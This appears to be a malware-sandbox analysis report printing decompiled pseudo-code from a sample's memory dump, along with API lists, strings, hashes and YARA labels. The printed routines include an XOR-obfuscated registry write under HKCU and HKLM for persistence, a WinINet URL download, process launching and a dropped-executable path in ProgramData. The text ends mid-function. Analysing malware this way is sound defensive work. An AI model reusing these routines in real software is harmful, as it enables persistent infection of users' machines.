0x00b48ac0
0x00b48ad8
0x00b48ade
0x00b48ae3
0x00b48ae7
0x00b48aea
0x00b48aef
0x00b48aef
0x00b48afc
0x00b48aff
0x00b48b05
0x00b48a8b
0x00b48a8c
0x00000000
0x00b48a8c
0x00b48a6e
0x00b48a6e
0x00b48a6e
0x00b48b21

APIs

InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00B48A62
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000000,00000000), ref: 00B48A7F
InternetCloseHandle.WININET(00000000), ref: 00B48A8C
InternetReadFile.WININET(00000000,?,000007D0,?), ref: 00B48AA7
InternetCloseHandle.WININET(00000000), ref: 00B48AFC
InternetCloseHandle.WININET(00000000), ref: 00B48AFF

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$Open$FileRead
String ID:
API String ID: 4294395943-0
Opcode ID: ec8b371fff68386fcbfb5ac6d7945c1995d3521921ba3ece5b772a9bcab27bd7
Instruction ID: d9a69031cbca952dc9939bad59f4c877ba666d513c67f077c900a5cd4f4e1321
Opcode Fuzzy Hash: ec8b371fff68386fcbfb5ac6d7945c1995d3521921ba3ece5b772a9bcab27bd7
Instruction Fuzzy Hash: 264172719087449BD311DF29DC80AAFF7E8FF99308F01591DF98853121EF74AA948B62

Uniqueness

Uniqueness Score: -1.00%

Function 00B49B90, Relevance: 9.1, APIs: 6, Instructions: 99
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B49B90(void* __ebx, void* __esi, char* _a4, char* _a8) {
				signed int _v8;
				char _v11;
				short _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v56;
				void* _v60;
				char* _v64;
				signed int _t37;
				char _t43;
				char _t50;
				char* _t55;
				int _t58;
				char* _t59;
				int _t61;
				char* _t62;
				char* _t67;
				char* _t69;
				char* _t71;
				signed int _t73;

				_t37 =  *0xb69014; // 0x26ce9e99
				_v8 = _t37 ^ _t73;
				asm("movaps xmm0, [0xb3dbe0]");
				_t55 = _a8;
				_t58 = 0;
				asm("movups [ebp-0x34], xmm0");
				asm("movaps xmm0, [0xb3ddb0]");
				_t71 = _a4;
				_v64 = _t55;
				asm("movups [ebp-0x24], xmm0");
				_v24 = 0x634150e;
				_v20 = 0x80f1616;
				_v16 = 0x1e383506;
				_v12 = 2;
				do {
					_t9 = _t58 + 0x40; // 0x40
					 *(_t73 + _t58 - 0x34) =  *(_t73 + _t58 - 0x34) ^ _t9;
					_t58 = _t58 + 1;
				} while (_t58 < 0x2d);
				_v11 = 0;
				RegOpenKeyExA(0x80000001,  &_v56, 0, 2,  &_v60);
				_t59 = _t71;
				_t17 =  &(_t59[1]); // 0x1
				_t67 = _t17;
				do {
					_t43 =  *_t59;
					_t59 =  &(_t59[1]);
				} while (_t43 != 0);
				RegSetValueExA(_v60, _t55, 0, 1, _t71, _t59 - _t67);
				RegCloseKey(_v60);
				asm("movaps xmm0, [0xb3dbd0]");
				asm("movups [ebp-0x34], xmm0");
				_t61 = 0;
				_v24 = 0x634150e;
				asm("movaps xmm0, [0xb3ddb0]");
				asm("movups [ebp-0x24], xmm0");
				_v20 = 0x80f1616;
				_v16 = 0x1e383506;
				_v12 = 2;
				do {
					_t24 = _t61 + 0x40; // 0x40
					 *(_t73 + _t61 - 0x34) =  *(_t73 + _t61 - 0x34) ^ _t24;
					_t61 = _t61 + 1;
				} while (_t61 < 0x2d);
				_v11 = 0;
				RegOpenKeyExA(0x80000002,  &_v56, 0, 2,  &_v60);
				_t62 = _t71;
				_t32 =  &(_t62[1]); // 0x1
				_t69 = _t32;
				do {
					_t50 =  *_t62;
					_t62 =  &(_t62[1]);
				} while (_t50 != 0);
				RegSetValueExA(_v60, _v64, 0, 1, _t71, _t62 - _t69);
				RegCloseKey(_v60);
				return E00B4AE43(_v8 ^ _t73);
			}

0x00b49b96
0x00b49b9d
0x00b49ba0
0x00b49baa
0x00b49bad
0x00b49baf
0x00b49bb4
0x00b49bbb
0x00b49bbe
0x00b49bc1
0x00b49bc5
0x00b49bcc
0x00b49bd3
0x00b49bda
0x00b49be0
0x00b49be0
0x00b49be3
0x00b49be7
0x00b49be8
0x00b49bf0
0x00b49c00
0x00b49c06
0x00b49c08
0x00b49c08
0x00b49c0b
0x00b49c0b
0x00b49c0d
0x00b49c0e
0x00b49c24
0x00b49c29
0x00b49c2f
0x00b49c38
0x00b49c3c
0x00b49c3e
0x00b49c45
0x00b49c4c
0x00b49c50
0x00b49c57
0x00b49c5e
0x00b49c64
0x00b49c64
0x00b49c67
0x00b49c6b
0x00b49c6c
0x00b49c74
0x00b49c84
0x00b49c8a
0x00b49c8c
0x00b49c8c
0x00b49c8f
0x00b49c8f
0x00b49c91
0x00b49c92
0x00b49ca4
0x00b49ca9
0x00b49cbc

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000002,?,00000000,00000000), ref: 00B49C00
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49C24
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49C29
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00000002,?,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49C84
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000001,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49CA4
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49CA9

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 4f7b7473b4cc6d9043940f183820f1030b2edce1b8c56c8fd4299076f2777055
Instruction ID: 8aa777a3e5d85021cfd53395fb2881dfead91ff96be0ce980c49b1a1bc126219
Opcode Fuzzy Hash: 4f7b7473b4cc6d9043940f183820f1030b2edce1b8c56c8fd4299076f2777055
Instruction Fuzzy Hash: F8418074905248BAEB05CFA4ED84AFDBBB9EF49308F108158F94167262EB715A85CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00B4F519, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00B4F519(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				long _t26;
				void* _t29;

				if( *0xb69080 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E00B4F844(__eflags,  *0xb69080);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00B4F87F(__eflags,  *0xb69080, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t29 = E00B55627();
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00B4F87F(__eflags,  *0xb69080, 0);
								} else {
									__eflags = E00B4F87F(__eflags,  *0xb69080, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00B50985(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x00b4f520
0x00b4f533
0x00b4f53a
0x00b4f53d
0x00b4f540
0x00b4f559
0x00b4f559
0x00b4f542
0x00b4f542
0x00b4f544
0x00b4f54e
0x00b4f555
0x00b4f557
0x00b4f55e
0x00b4f560
0x00b4f567
0x00b4f56b
0x00b4f56d
0x00b4f581
0x00b4f581
0x00b4f58a
0x00b4f56f
0x00b4f57d
0x00b4f57f
0x00b4f593
0x00b4f595
0x00b4f595
0x00000000
0x00000000
0x00000000
0x00b4f57f
0x00b4f598
0x00000000
0x00000000
0x00000000
0x00b4f557
0x00b4f544
0x00b4f5a0
0x00b4f5aa
0x00b4f522
0x00b4f524
0x00b4f524

APIs

GetLastError.KERNEL32(?,?,00B4F510,00B4D425), ref: 00B4F527
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B4F535
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B4F54E
SetLastError.KERNEL32(00000000,?,00B4F510,00B4D425), ref: 00B4F5A0

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: df7457cec5e2e05464673b5fdc49affbbe18a8786bf11fb1191d36ae7950f8ef
Instruction ID: 477be4285c19c7236f54fa5ee32f69955c9d4f40dd129f8810ddeff016e5474a
Opcode Fuzzy Hash: df7457cec5e2e05464673b5fdc49affbbe18a8786bf11fb1191d36ae7950f8ef
Instruction Fuzzy Hash: 2701FC3220D3135EAF142B757C85ABA27E8DB6577572003BAF414870F1EF654D00B140

Uniqueness

Uniqueness Score: -1.00%

Function 00B456CF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100
processCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00B456CF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v9;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v36;
				char _v40;
				struct _PROCESS_INFORMATION _v56;
				struct _STARTUPINFOA _v132;
				signed int _t29;
				void _t34;
				void _t35;
				void* _t38;
				CHAR* _t48;
				void* _t50;
				signed int _t52;
				struct _SECURITY_ATTRIBUTES* _t57;
				void* _t60;
				signed int _t61;
				void* _t64;
				void* _t71;
				long _t72;
				signed int _t73;

				_t29 =  *0xb69014; // 0x26ce9e99
				_v8 = _t29 ^ _t73;
				_t48 = E00B509A2();
				__imp__SHGetFolderPathA(0, 0x26, 0, 0, _t48, 0x104);
				asm("movaps xmm0, [0xb3ddf0]");
				_t50 = 0;
				asm("movups [ebp-0x24], xmm0");
				asm("movaps xmm0, [0xb3daa0]");
				asm("movups [ebp-0x14], xmm0");
				do {
					_t2 = _t50 + 0x40; // 0x40
					 *(_t73 + _t50 - 0x24) =  *(_t73 + _t50 - 0x24) ^ _t2;
					_t50 = _t50 + 1;
				} while (_t50 < 0x1f);
				_t60 =  &_v40;
				_v9 = 0;
				_t71 = _t60;
				do {
					_t34 =  *_t60;
					_t60 = _t60 + 1;
				} while (_t34 != 0);
				_t61 = _t60 - _t71;
				_t9 = _t48 - 1; // -1
				_t64 = _t9;
				do {
					_t35 =  *(_t64 + 1);
					_t64 = _t64 + 1;
				} while (_t35 != 0);
				_t52 = _t61 >> 2;
				memcpy(_t64, _t71, _t52 << 2);
				_t55 = _t61 & 0x00000003;
				_t38 = memcpy(_t71 + _t52 + _t52, _t71, _t61 & 0x00000003);
				_t72 = 0x44;
				E00B4D0F0(_t71 + (_t61 & 0x00000003) + _t55, _t38, 0, _t72);
				asm("movaps xmm0, [0xb3dc80]");
				_v132.cb = _t72;
				asm("stosd");
				_v132.lpDesktop = 0xb699c0;
				asm("movups [ebp-0x20], xmm0");
				_v20 = 0x2b377c70;
				_t57 = 0;
				asm("stosd");
				_v16 = 0x31303a20;
				_v12 = 0;
				asm("stosd");
				asm("stosd");
				do {
					_t19 = _t57 + 0x40; // 0x40
					 *(_t73 + _t57 - 0x20) =  *(_t73 + _t57 - 0x20) ^ _t19;
					_t57 =  &(_t57->nLength);
				} while (_t57 < 0x18);
				_v12 = 0;
				CreateProcessA(_t48,  &_v36, 0, 0, 0, 0, 0, 0,  &_v132,  &_v56);
				return E00B4AE43(_v8 ^ _t73);
			}

0x00b456d8
0x00b456df
0x00b456f0
0x00b456fa
0x00b45700
0x00b45707
0x00b45709
0x00b4570d
0x00b45714
0x00b45718
0x00b45718
0x00b4571b
0x00b4571f
0x00b45720
0x00b45725
0x00b45728
0x00b4572c
0x00b4572e
0x00b4572e
0x00b45730
0x00b45731
0x00b45735
0x00b45737
0x00b45737
0x00b4573a
0x00b4573a
0x00b4573d
0x00b4573e
0x00b45747
0x00b4574a
0x00b4574e
0x00b45753
0x00b45755
0x00b4575a
0x00b4575f
0x00b4576b
0x00b4576e
0x00b45774
0x00b4577b
0x00b4577f
0x00b45786
0x00b45788
0x00b45789
0x00b45790
0x00b45793
0x00b45794
0x00b45795
0x00b45795
0x00b45798
0x00b4579c
0x00b4579d
0x00b457a5
0x00b457b8
0x00b457cc

APIs

SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,00000000), ref: 00B456FA
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B457B8

Strings

:01, xrefs: 00B45789
Tett, xrefs: 00B45774
p|7+, xrefs: 00B4577F

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFolderPathProcess
String ID: :01$Tett$p|7+
API String ID: 3403665443-2609737526
Opcode ID: fec00bfa706e7f66c5e22952799ef385276856dd5fb986c61e21c10bd5b3b6b1
Instruction ID: 041c136af8fb1986efddb326fe731d10abfbb5da810e3f50a5309a694ff72957
Opcode Fuzzy Hash: fec00bfa706e7f66c5e22952799ef385276856dd5fb986c61e21c10bd5b3b6b1
Instruction Fuzzy Hash: F4312570904648AAEF04DBBCDC44AFEBBF9FF48304F1041A8E941A7152EB745A49C760

Uniqueness

Uniqueness Score: -1.00%

Function 00B59FBE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B59FBE(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				void* _t14;
				void* _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					if( *_t38 != 0) {
						_t14 = E00B5A975(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						if(_t14 != 0) {
							_t36 = _a8;
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00B5A975(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								if(_t15 != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
								} else {
									E00B55B87(GetLastError());
									_t17 =  *((intOrPtr*)(E00B55BBD()));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00B55FB4(_t36, _t14);
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00B55B87(GetLastError());
						_t17 =  *((intOrPtr*)(E00B55BBD()));
						goto L14;
					}
					_t39 = _a8;
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00B55FB4(_t39, 1);
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00B56039(_a8);
				return 0;
			}

0x00b59fc4
0x00b59fc9
0x00b59fe0
0x00b5a012
0x00b5a01c
0x00b5a035
0x00b5a03b
0x00b5a049
0x00b5a058
0x00b5a062
0x00b5a07b
0x00b5a07e
0x00b5a064
0x00b5a06b
0x00b5a076
0x00b5a076
0x00b5a080
0x00b5a081
0x00000000
0x00b5a081
0x00b5a040
0x00b5a047
0x00000000
0x00000000
0x00000000
0x00b5a047
0x00b5a025
0x00b5a030
0x00000000
0x00b5a030
0x00b59fe2
0x00b59fe8
0x00b59ffb
0x00b59ffe
0x00b5a000
0x00b5a002
0x00000000
0x00b5a002
0x00b59fee
0x00b59ff5
0x00000000
0x00000000
0x00000000
0x00b59ff5
0x00b59fce
0x00000000

Strings

C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe, xrefs: 00B59FC3

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
API String ID: 0-1411296268
Opcode ID: 9fa23cb303b63ec6440e236c8a0c9277ce9424cc354b06120b88a10713c45e1e
Instruction ID: eac2f34b0333dc9acd97aa90372cbec852887abcb731fc5c1a9a3d4f0b0d0262
Opcode Fuzzy Hash: 9fa23cb303b63ec6440e236c8a0c9277ce9424cc354b06120b88a10713c45e1e
Instruction Fuzzy Hash: F121B071604606BFDB60AF608C80F6AB7DCEE013AB71447D4FD64A7181EB31EC488BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B52E5E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00B52E5E(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0xb672b4(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00b52e64
0x00b52e68
0x00b52e73
0x00b52e7b
0x00b52e86
0x00b52e8c
0x00b52e90
0x00b52e97
0x00b52e9d
0x00b52e9d
0x00b52e9f
0x00b52ea4
0x00000000
0x00b52ea9
0x00b52eb2

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00B52E53,?,?,00B52E1B,00000001,00000000,?), ref: 00B52E73
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B52E86
FreeLibrary.KERNEL32(00000000,?,?,00B52E53,?,?,00B52E1B,00000001,00000000,?), ref: 00B52EA9

Strings

CorExitProcess, xrefs: 00B52E7E
mscoree.dll, xrefs: 00B52E6C

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 78f707cc016627b7912b1cdba18480d3c8d26b1e32b738c3330b4ad1e18b6eed
Instruction ID: a9c530a47468518eef862f6c196ff88e2cfc018837a547315fd122e37d9a7966
Opcode Fuzzy Hash: 78f707cc016627b7912b1cdba18480d3c8d26b1e32b738c3330b4ad1e18b6eed
Instruction Fuzzy Hash: 85F08231546218FBDB119B91DE0EB9EBBA8EB42716F1000E5FC04A21A0CFB55E00DA90

Uniqueness

Uniqueness Score: -1.00%

Function 00B542A7, Relevance: 7.7, APIs: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B542A7(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int* _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int* _v732;
				intOrPtr _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1264;
				intOrPtr _v1276;
				signed int _v1288;
				signed int _t240;
				void* _t243;
				signed int _t246;
				signed int _t248;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t269;
				signed int _t272;
				signed int _t279;
				signed int _t282;
				signed int _t283;
				intOrPtr _t284;
				signed int _t287;
				signed int _t289;
				signed int _t290;
				intOrPtr _t292;
				signed int _t295;
				signed int _t296;
				signed int _t298;
				signed int _t318;
				signed int _t320;
				signed int _t322;
				signed int _t327;
				void* _t329;
				signed int _t331;
				void* _t332;
				intOrPtr _t333;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t344;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				intOrPtr* _t363;
				signed int _t365;
				intOrPtr* _t375;
				intOrPtr* _t378;
				void* _t381;
				signed int _t382;
				intOrPtr* _t385;
				intOrPtr* _t386;
				signed int _t395;
				intOrPtr _t398;
				intOrPtr* _t399;
				signed int _t401;
				signed int* _t405;
				signed int _t406;
				intOrPtr* _t412;
				intOrPtr* _t413;
				signed int _t421;
				signed int _t422;
				short _t423;
				void* _t424;
				void* _t426;
				signed int _t427;
				signed int _t429;
				intOrPtr _t430;
				signed int _t433;
				intOrPtr _t434;
				signed int _t436;
				signed int _t439;
				intOrPtr _t445;
				signed int _t446;
				signed int _t448;
				signed int _t449;
				signed int _t453;
				signed int _t455;
				signed int _t458;
				signed int* _t459;
				intOrPtr* _t460;
				short _t461;
				void* _t463;
				signed int _t465;
				signed int _t467;
				void* _t469;
				void* _t470;
				void* _t472;
				signed int _t473;
				void* _t474;
				void* _t476;
				signed int _t477;
				void* _t479;
				void* _t481;
				signed int _t493;

				_t421 = __edx;
				_t463 = _t469;
				_t470 = _t469 - 0x10;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t358 = E00B56F1C(0x6a6);
				_t239 = 0;
				if(_t358 == 0) {
					L20:
					return _t239;
				} else {
					_push(__edi);
					_t2 = _t358 + 4; // 0x4
					_t429 = _t2;
					 *_t429 = 0;
					 *_t358 = 1;
					_t445 = _a4;
					_t240 = _t445 + 0x30;
					_push( *_t240);
					_v16 = _t240;
					_push(0xb34e28);
					_push( *0xb34d64);
					E00B541E1(_t358, _t429, _t445, _t429, 0x351, 3);
					_t472 = _t470 + 0x18;
					_v8 = 0xb34d64;
					while(1) {
						L2:
						_t243 = E00B59764(_t429, 0x351, 0xb34e24);
						_t473 = _t472 + 0xc;
						if(_t243 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t412 = _t8;
							_t338 =  *_v16;
							_v16 = _t412;
							_t413 =  *_t412;
							_v20 = _t413;
							goto L4;
						}
						while(1) {
							L4:
							_t421 =  *_t338;
							if(_t421 !=  *_t413) {
								break;
							}
							if(_t421 == 0) {
								L8:
								_t339 = 0;
							} else {
								_t421 =  *((intOrPtr*)(_t338 + 2));
								if(_t421 !=  *((intOrPtr*)(_t413 + 2))) {
									break;
								} else {
									_t338 = _t338 + 4;
									_t413 = _t413 + 4;
									if(_t421 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0xb34e28);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t339);
							_t344 = _v8 + 0xc;
							_v8 = _t344;
							_push( *_t344);
							E00B541E1(_t358, _t429, _t445, _t429, 0x351, 3);
							_t472 = _t473 + 0x18;
							if(_v8 < 0xb34d94) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E00B564B8(_t358);
									_t436 = _t429 | 0xffffffff;
									__eflags =  *(_t445 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E00B564B8( *(_t445 + 0x28));
										}
									}
									__eflags =  *(_t445 + 0x24);
									if( *(_t445 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t436 == 1;
										if(_t436 == 1) {
											E00B564B8( *(_t445 + 0x24));
										}
									}
									 *(_t445 + 0x24) = 0;
									 *(_t445 + 0x1c) = 0;
									 *(_t445 + 0x28) = 0;
									 *((intOrPtr*)(_t445 + 0x20)) = 0;
									_t239 =  *((intOrPtr*)(_t445 + 0x40));
								} else {
									_t439 = _t429 | 0xffffffff;
									_t493 =  *(_t445 + 0x28);
									if(_t493 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t493 == 0) {
											E00B564B8( *(_t445 + 0x28));
										}
									}
									if( *(_t445 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t439 == 1) {
											E00B564B8( *(_t445 + 0x24));
										}
									}
									 *(_t445 + 0x24) =  *(_t445 + 0x24) & 0x00000000;
									_t28 = _t358 + 4; // 0x4
									_t239 = _t28;
									 *(_t445 + 0x1c) =  *(_t445 + 0x1c) & 0x00000000;
									 *(_t445 + 0x28) = _t358;
									 *((intOrPtr*)(_t445 + 0x20)) = _t239;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t339 = _t338 | 0x00000001;
						__eflags = _t339;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00B52919();
					asm("int3");
					_push(_t463);
					_t465 = _t473;
					_t474 = _t473 - 0x1d0;
					_t246 =  *0xb69014; // 0x26ce9e99
					_v60 = _t246 ^ _t465;
					_t248 = _v44;
					_push(_t358);
					_push(_t445);
					_t446 = _v40;
					_push(_t429);
					_t430 = _v48;
					_v512 = _t430;
					__eflags = _t248;
					if(_t248 == 0) {
						_v460 = 1;
						_v468 = 0;
						_t360 = 0;
						_v452 = 0;
						__eflags = _t446;
						if(__eflags == 0) {
							L79:
							E00B542A7(_t360, _t421, _t430, _t446, __eflags, _t430);
							goto L80;
						} else {
							__eflags =  *_t446 - 0x4c;
							if( *_t446 != 0x4c) {
								L59:
								_t254 = E00B53E03(_t360, _t430, _t446, _t446,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t476 = _t474 + 0x18;
								__eflags = _t254;
								if(_t254 != 0) {
									__eflags = 0;
									_t422 = _t430 + 0x20;
									_t448 = 0;
									_v452 = _t422;
									do {
										__eflags = _t448;
										if(_t448 == 0) {
											L74:
											_t255 = _v460;
										} else {
											_t375 =  *_t422;
											_t256 =  &_v276;
											while(1) {
												__eflags =  *_t256 -  *_t375;
												_t430 = _v464;
												if( *_t256 !=  *_t375) {
													break;
												}
												__eflags =  *_t256;
												if( *_t256 == 0) {
													L67:
													_t257 = 0;
												} else {
													_t423 =  *((intOrPtr*)(_t256 + 2));
													__eflags = _t423 -  *((intOrPtr*)(_t375 + 2));
													_v454 = _t423;
													_t422 = _v452;
													if(_t423 !=  *((intOrPtr*)(_t375 + 2))) {
														break;
													} else {
														_t256 = _t256 + 4;
														_t375 = _t375 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t257;
												if(_t257 == 0) {
													_t360 = _t360 + 1;
													__eflags = _t360;
													goto L74;
												} else {
													_t258 =  &_v276;
													_push(_t258);
													_push(_t448);
													_push(_t430);
													L83();
													_t422 = _v452;
													_t476 = _t476 + 0xc;
													__eflags = _t258;
													if(_t258 == 0) {
														_t255 = 0;
														_v460 = 0;
													} else {
														_t360 = _t360 + 1;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t257 = _t256 | 0x00000001;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t448 = _t448 + 1;
										_t422 = _t422 + 0x10;
										_v452 = _t422;
										__eflags = _t448 - 5;
									} while (_t448 <= 5);
									__eflags = _t255;
									if(__eflags != 0) {
										goto L79;
									} else {
